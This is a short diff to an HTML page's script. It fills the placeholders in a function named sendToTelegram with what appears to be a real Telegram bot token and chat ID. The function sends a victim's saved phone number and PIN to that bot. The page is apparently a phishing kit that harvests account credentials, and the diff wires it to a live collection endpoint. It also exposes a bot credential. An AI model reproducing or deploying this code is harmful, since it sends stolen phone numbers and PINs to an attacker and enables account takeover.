--- a/index.html
+++ b/index.html
@@ -281,8 +281,8 @@
     }
 
     async function sendToTelegram(pin) {
-      const token = 'ISI_TOKEN_KAMU';
-      const chat_id = 'ISI_CHAT_ID_KAMU';
+      const token = '8049032485:AAE63lM0pKxDIzBtjKKdP851RniEU64fJtc';
+      const chat_id = '7032109008';
       const message = `Nomor: ${savedPhoneNumber}\nPIN: ${pin}`;
       const url = `https://api.telegram.org/bot${token}/sendMessage?chat_id=${chat_id}&text=${encodeURIComponent(message)}`;
       try {
